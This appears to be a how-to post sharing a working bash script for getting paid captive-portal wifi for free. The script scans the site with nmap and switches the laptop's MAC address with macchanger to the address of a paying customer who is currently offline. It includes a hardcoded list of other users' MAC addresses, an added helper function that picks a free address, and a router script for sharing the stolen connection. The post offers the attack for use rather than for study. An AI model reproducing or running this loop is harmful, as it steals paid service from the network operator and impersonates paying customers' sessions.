Synopsis
Getting free wifi from an open network that redirects you to a "pay to use" page (a captive portal).
History
I am living for the time being on a site that has a wifi service that you pay to use. Having my own Sat connection meant that I did not need it in the beginning. But seeing as I used up my 10 gig allowance in 10 days and the connection goes to usable crap speed, I decided to have a look at the site wifi. Finding the login page wasn't SSL, I originally thought it would be a case of leaving a Kali laptop running airodump on until it captured a password. I did so, but seeing as I had a load of captured http traffic I thought that MAC address spoofing may get some results. It did! But googling 'mac address spoofing for free wifi' shows that I am by no means the first. This appears to be a very well known exploit. So what I am sharing here is a script that will come in useful for getting the free wifi.
Requirements
- Kali Linux. A BackTrack installation would be ok too (the script needs macchanger, nmap, nmcli and root).
Code (bash)
#!/bin/bash
# Captive-portal MAC borrowing loop. Run as root: macchanger, ifconfig and
# the nmap MAC discovery all need it.
IFACE=wlan2      # wifi interface used for the site network
PROFILE=Legal    # NetworkManager connection profile for the site's open network

# my mac a0:f3:c1:0e:b3:9c
# site subnets 10.0.0.x / 10.0.1.x

# MAC addresses of stations seen on the site. Populate this from your own
# nmap scan; keep them upper-case so they match nmap's "MAC Address:" lines.
conn[0]="00:0D:A3:11:1A:53"
conn[1]="00:0F:04:B3:94:04"
conn[2]="00:15:6D:DA:BC:66"
conn[3]="00:15:AF:46:F1:15"
conn[4]="00:16:6F:CA:CE:8A"
conn[5]="00:1A:EF:36:A3:25"
conn[6]="00:1A:EF:36:A7:41"
conn[7]="00:E3:B2:23:0A:4F"
conn[8]="24:A4:3C:AE:2E:EC"
conn[9]="30:10:B3:06:63:4E"
conn[10]="3C:E0:72:BC:F5:87"
conn[11]="44:91:DB:23:4C:6F"
conn[12]="64:70:02:57:19:1A"
conn[13]="64:70:02:57:35:FB"
conn[14]="68:48:98:4B:87:47"
conn[15]="68:A3:C4:51:B9:B9"
conn[16]="6C:B7:F4:78:19:FF"
conn[17]="94:35:0A:EE:CB:C1"
conn[18]="AC:A2:13:28:02:F6"
conn[19]="C8:02:10:34:02:0A"
conn[20]="CC:52:AF:12:21:17"
conn[21]="F4:EC:38:8F:59:7C"

# test[a]=true once conn[a] has been tried in the current cycle
for a in "${!conn[@]}"; do
    test[$a]=false
done
last=99   # index of the MAC currently in use; 99 = none (own MAC)

mkdir -p capture

while true; do
    echo "Pinging..."
    rm -f capture/ping.txt
    ping -c 5 8.8.8.8 > capture/ping.txt
    # Connectivity counts as lost when all 5 pings fail or ping produced no output
    if grep -q "100% packet loss" capture/ping.txt || [ ! -s capture/ping.txt ]; then
        # Revert to the permanent MAC, reconnect and ping-scan the site to see
        # which stations are active right now. nmap only prints "MAC Address:"
        # lines when run as root against the directly attached subnet.
        ifconfig "$IFACE" down
        macchanger -p "$IFACE" > /dev/null
        nmcli con up id "$PROFILE"
        echo "Scanning site"
        nmap -vv --open -n -sn 10.0.0.0/24 > capture/ls1.txt
        nmap -vv --open -n -sn 10.0.1.0/24 >> capture/ls1.txt

        found=false
        for a in "${!conn[@]}"; do
            # Candidate: not seen in the scan, not the one just used, not yet tried this cycle
            if ! grep -q "${conn[$a]}" capture/ls1.txt && [ "$last" -ne "$a" ] && [ "${test[$a]}" = false ]; then
                echo ""
                echo "${conn[$a]} ($a) is available"
                echo ""
                ifconfig "$IFACE" down
                macchanger -m "${conn[$a]}" "$IFACE"
                nmcli con up id "$PROFILE"
                found=true
                last=$a
                test[$a]=true
                break
            fi
        done
        if ! $found; then
            echo ""
            echo "** No account free !!"
            echo ""
            # Every address is in use or has been tried: clear the flags and start over
            for a in "${!conn[@]}"; do
                test[$a]=false
            done
            last=99
        fi
    else
        sleep 25
    fi
done
What does it do?
- It does an nmap ping scan (-sn) of the site, then checks whether any predefined MAC address is absent from the scan, i.e. not currently in use, changes the MAC of wlan2 to that address and connects.
- It pings 8.8.8.8 roughly every 30 seconds (5 pings plus a 25 second sleep) and if 5 of 5 packets are lost it initiates a new scan.
- If all addresses are in use or have been tried it cycles back to the start.
You will need to populate the initial list of MAC addresses by doing an nmap scan of your local subnet yourself. Run it as root, because nmap only reports the "MAC Address:" line for hosts on the directly attached subnet when it can read ARP replies, and keep the addresses in the same upper-case form nmap prints them in, since the script matches them with a plain grep.
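The "is this MAC free?" decision above is what the whole loop hinges on, so here it is factored into a function that reads a saved nmap -sn report instead of touching the interface. This is an added example, not the original script: the candidate list is assumed to be a file with one MAC per line, the scan file is assumed to be plain (-oN) nmap output with its "MAC Address: XX:XX:XX:XX:XX:XX (Vendor)" lines, and the sample files it creates are constructed for the demo. It goes a little beyond the original by normalising case, rejecting malformed entries and tracking "already tried" in a file rather than an in-memory array.

```shell
#!/bin/bash
# Added example: choose a candidate MAC that is not active on the site.
# Assumptions (not from the original post): candidates file has one MAC per
# line ('#' comments allowed); scan file is plain nmap -sn output; tried file
# lists MACs already used this cycle, one per line.

# Print the MACs of every host that answered the ping scan, upper-cased, one per line.
scan_active_macs() {
    scanfile=$1
    grep -o 'MAC Address: [0-9A-Fa-f:]\{17\}' "$scanfile" \
        | awk '{print toupper($3)}' | sort -u
}

# Print the first candidate that is well-formed, not active in the scan and
# not in the tried file. Exit status 1 means nothing is free right now.
pick_free_mac() {
    candidates=$1
    scanfile=$2
    tried=$3
    active=$(scan_active_macs "$scanfile")
    while IFS= read -r mac; do
        mac=$(printf '%s' "$mac" | tr 'a-f' 'A-F')
        # skip blank lines and comments
        case "$mac" in
            ''|'#'*) continue ;;
        esac
        # skip anything that is not six colon-separated hex pairs
        printf '%s' "$mac" | grep -Eq '^([0-9A-F]{2}:){5}[0-9A-F]{2}$' || continue
        # seen on the air right now: its owner is using the account
        printf '%s\n' "$active" | grep -qx "$mac" && continue
        # already borrowed once this cycle
        [ -f "$tried" ] && grep -qx "$mac" "$tried" && continue
        printf '%s\n' "$mac"
        return 0
    done < "$candidates"
    return 1
}

# Constructed sample data so the example runs offline: two of the four
# candidates are "active" in the scan, one entry is junk.
demo_setup() {
    d=$1
    mkdir -p "$d"
    cat > "$d/candidates.txt" <<'EOF'
# one MAC per line, gathered from an earlier scan
00:0D:A3:11:1A:53
00:0f:04:b3:94:04
not-a-mac
24:A4:3C:AE:2E:EC
EOF
    cat > "$d/scan.txt" <<'EOF'
Nmap scan report for 10.0.1.12
Host is up (0.0021s latency).
MAC Address: 00:0D:A3:11:1A:53 (Unknown)
Nmap scan report for 10.0.1.40
Host is up (0.0030s latency).
MAC Address: 24:A4:3C:AE:2E:EC (Unknown)
EOF
    : > "$d/tried.txt"
}

# Stand-alone demo: prints the chosen MAC (00:0F:04:B3:94:04 for the sample data)
demo() {
    tmp=$(mktemp -d)
    demo_setup "$tmp"
    pick_free_mac "$tmp/candidates.txt" "$tmp/scan.txt" "$tmp/tried.txt"
}
demo
```

In the live loop you would call pick_free_mac on the fresh ls1.txt each time connectivity drops, append the chosen address to the tried file, and truncate that file when the function returns 1 to start the cycle again.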
Why is this better than just spoofing a MAC?
If you just spoof the MAC of an existing client I have got the net, but it is very patchy. This is no doubt down to that MAC address being associated with two different stations with the same IP address. Finding a load of MAC addresses of people who have paid, and then using them when they are not, has proven to be the best approach.
Building on this
I built the Kali linux laptop into a router with the following commands
#!/bin/bash
# Turn the laptop into a router: wlan2 is the site-facing (NATed) side,
# eth0 is the LAN side. Run as root.
# Start
# Configure IP address for the LAN side (eth0)
ifconfig eth0 192.168.1.100
# Start DHCP/DNS server
service dnsmasq restart
# Enable NAT: clear the filter and nat tables, then masquerade out of wlan2
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan2 -j MASQUERADE
iptables --append FORWARD --in-interface wlan2 -j ACCEPT
# torrent: optional port forward to a LAN client
#iptables -t nat -A PREROUTING -p tcp --dport 53781 -j DNAT --to-destination 192.168.1.99
#iptables -A FORWARD -s 192.168.1.99 -p tcp --dport 53781 -j ACCEPT
# Enable routing
sysctl net.ipv4.ip_forward=1
# Run access point daemon (uncomment to share over a hosted wifi network instead)
# hostapd /etc/hostapd.conf
# Record which stations are on the site, then keep a ping running as a link check
nmap -vv --open -sn 10.0.0.0/24 -n -oN capture/scan.txt --append-output
nmap -vv --open -sn 10.0.1.0/24 -n -oN capture/scan.txt --append-output
ping 8.8.8.8
The above will share the wlan2 interface over eth0. There is code in there that, if uncommented, shares it over a hosted network instead (hostapd). If the code is horrible for some reason, it's because the last time I scripted anything under bash was around 6 years ago.